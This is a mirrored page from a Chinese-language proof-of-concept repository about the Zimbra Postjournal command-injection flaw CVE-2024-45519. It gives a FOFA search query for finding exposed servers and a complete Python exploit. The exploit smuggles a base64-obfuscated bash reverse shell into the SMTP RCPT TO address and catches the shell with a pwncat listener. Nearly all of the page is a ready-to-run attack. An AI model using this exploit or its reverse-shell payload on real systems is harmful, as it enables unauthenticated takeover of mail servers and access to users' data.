mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
183 lines
5.3 KiB
Markdown
183 lines
5.3 KiB
Markdown
|
# Zimbra远程命令执行漏洞(CVE-2024-45519)
|
|||
|
|
|
|||
|
|
CVE-2024-45519 是 Zimbra Collaboration (ZCS) 中的一个漏洞,Zimbra Collaboration (ZCS) 8.8.15 补丁 46 之前的版本、9.0.0 补丁 41 之前的 9、10.0.9 之前的 10 以及 10.1.1 之前的 10.1 中的期刊后服务有时允许未经身份验证的用户执行命令。
|
|||
|
|
|
|||
|
|
## fofa
|
|||
|
|
|
|||
|
|
```javascript
|
|||
|
|
icon_hash="1624375939"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## poc
|
|||
|
|
|
|||
|
|
```python
|
|||
|
|
import time
|
|||
|
|
import base64
|
|||
|
|
import socket
|
|||
|
|
import threading
|
|||
|
|
import pwncat.manager
|
|||
|
|
import rich_click as click
|
|||
|
|
|
|||
|
|
from pwn import *
|
|||
|
|
from faker import Faker
|
|||
|
|
|
|||
|
|
|
|||
|
|
class SMTPExploit:
|
|||
|
|
def __init__(self, target, port, lhost, lport):
|
|||
|
|
self.target = target
|
|||
|
|
self.port = port
|
|||
|
|
self.lhost = lhost
|
|||
|
|
self.lport = lport
|
|||
|
|
self.mail_from = self.generate_random_email()
|
|||
|
|
self.rcpt_to = self.generate_random_email()
|
|||
|
|
self.sock = None
|
|||
|
|
self.command = self.generate_base64_revshell()
|
|||
|
|
|
|||
|
|
def generate_random_email(self):
|
|||
|
|
fake = Faker()
|
|||
|
|
return fake.email()
|
|||
|
|
|
|||
|
|
def generate_base64_revshell(self):
|
|||
|
|
revshell = f"/bin/bash -i 5<> /dev/tcp/{self.lhost}/{self.lport} 0<&5 1>&5 2>&5"
|
|||
|
|
base64_revshell = base64.b64encode(revshell.encode()).decode()
|
|||
|
|
|
|||
|
|
payload = f"echo${{IFS}}{base64_revshell}|base64${{IFS}}-d|bash"
|
|||
|
|
return payload
|
|||
|
|
|
|||
|
|
def generate_injected_rcpt_to(self):
|
|||
|
|
return f'"aabbb$({self.command})@{self.rcpt_to}"'
|
|||
|
|
|
|||
|
|
def connect(self):
|
|||
|
|
try:
|
|||
|
|
self.sock = remote(self.target, self.port)
|
|||
|
|
banner = self.sock.recv(4096)
|
|||
|
|
log.info(f"Banner received: {banner.decode().strip()}")
|
|||
|
|
except Exception as e:
|
|||
|
|
log.error(f"Failed to connect to SMTP server: {e}")
|
|||
|
|
self.clean_exit()
|
|||
|
|
|
|||
|
|
def send_smtp_command(self, command):
|
|||
|
|
try:
|
|||
|
|
self.sock.sendline(command.encode())
|
|||
|
|
response = self.sock.recv(4096).decode().strip()
|
|||
|
|
log.info(f"Response: {response}")
|
|||
|
|
return response
|
|||
|
|
except EOFError:
|
|||
|
|
log.error("Connection closed by the server.")
|
|||
|
|
self.clean_exit()
|
|||
|
|
except Exception as e:
|
|||
|
|
log.error(f"Error sending command '{command}': {e}")
|
|||
|
|
self.clean_exit()
|
|||
|
|
|
|||
|
|
def clean_exit(self):
|
|||
|
|
"""Close the socket and stop the listener in case of failure"""
|
|||
|
|
if self.sock:
|
|||
|
|
self.sock.close()
|
|||
|
|
log.info("Connection closed")
|
|||
|
|
listener.listener_event.set()
|
|||
|
|
log.error("Exploitation failed, exiting.")
|
|||
|
|
exit(1)
|
|||
|
|
|
|||
|
|
def run(self):
|
|||
|
|
log.info(f"Connecting to SMTP server {self.target}:{self.port}...")
|
|||
|
|
self.connect()
|
|||
|
|
|
|||
|
|
self.send_smtp_command("EHLO localhost")
|
|||
|
|
|
|||
|
|
self.send_smtp_command(f"MAIL FROM: <{self.mail_from}>")
|
|||
|
|
|
|||
|
|
injected_rcpt_to = self.generate_injected_rcpt_to()
|
|||
|
|
self.send_smtp_command(f"RCPT TO: <{injected_rcpt_to}>")
|
|||
|
|
|
|||
|
|
self.send_smtp_command("DATA")
|
|||
|
|
|
|||
|
|
self.sock.sendline("Test message".encode())
|
|||
|
|
self.sock.sendline(".".encode())
|
|||
|
|
data_response = self.sock.recv(4096).decode().strip()
|
|||
|
|
log.info(f"Response after data: {data_response}")
|
|||
|
|
|
|||
|
|
self.send_smtp_command("QUIT")
|
|||
|
|
|
|||
|
|
self.sock.close()
|
|||
|
|
log.success("Exploitation completed successfully!")
|
|||
|
|
|
|||
|
|
|
|||
|
|
class Listener:
|
|||
|
|
def __init__(self, bind_host, bind_port):
|
|||
|
|
self.bind_host = bind_host
|
|||
|
|
self.bind_port = bind_port
|
|||
|
|
|
|||
|
|
def start_listener(self):
|
|||
|
|
try:
|
|||
|
|
with socket.create_server((self.bind_host, self.bind_port)) as listener:
|
|||
|
|
log.info(f"Listening on {self.bind_host}:{self.bind_port}...")
|
|||
|
|
listener.settimeout(1)
|
|||
|
|
while True:
|
|||
|
|
try:
|
|||
|
|
client, addr = listener.accept()
|
|||
|
|
log.success(f"Received connection from {addr[0]}:{addr[1]}")
|
|||
|
|
with pwncat.manager.Manager() as manager:
|
|||
|
|
manager.create_session(
|
|||
|
|
platform="linux", protocol="socket", client=client
|
|||
|
|
)
|
|||
|
|
manager.interactive()
|
|||
|
|
break
|
|||
|
|
except socket.timeout:
|
|||
|
|
continue
|
|||
|
|
except Exception as e:
|
|||
|
|
log.error(f"Failed to start listener: {e}")
|
|||
|
|
|
|||
|
|
|
|||
|
|
@click.command()
|
|||
|
|
@click.argument("target")
|
|||
|
|
@click.option(
|
|||
|
|
"-p",
|
|||
|
|
"--port",
|
|||
|
|
type=int,
|
|||
|
|
default=25,
|
|||
|
|
show_default=True,
|
|||
|
|
help="SMTP port (default: 25)",
|
|||
|
|
)
|
|||
|
|
@click.option(
|
|||
|
|
"-lh",
|
|||
|
|
"--lhost",
|
|||
|
|
default="0.0.0.0",
|
|||
|
|
show_default=True,
|
|||
|
|
help="Local host for listener",
|
|||
|
|
)
|
|||
|
|
@click.option(
|
|||
|
|
"-lp",
|
|||
|
|
"--lport",
|
|||
|
|
type=int,
|
|||
|
|
default=4444,
|
|||
|
|
show_default=True,
|
|||
|
|
help="Local port for listener",
|
|||
|
|
)
|
|||
|
|
def main(target, port, lhost, lport):
|
|||
|
|
"""Exploit the Zimbra Postjournal SMTP vulnerability to execute arbitrary commands."""
|
|||
|
|
listener = Listener(lhost, lport)
|
|||
|
|
listener_thread = threading.Thread(target=listener.start_listener)
|
|||
|
|
listener_thread.start()
|
|||
|
|
|
|||
|
|
time.sleep(1)
|
|||
|
|
|
|||
|
|
exploit = SMTPExploit(target, port, lhost, lport)
|
|||
|
|
try:
|
|||
|
|
exploit.run()
|
|||
|
|
except Exception as e:
|
|||
|
|
log.error(f"An error occurred during the exploit: {e}")
|
|||
|
|
|
|||
|
|
listener_thread.join()
|
|||
|
|
|
|||
|
|
|
|||
|
|
if __name__ == "__main__":
|
|||
|
|
main()
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
## 漏洞来源
|
|||
|
|
|
|||
|
|
- https://github.com/Chocapikk/CVE-2024-45519
|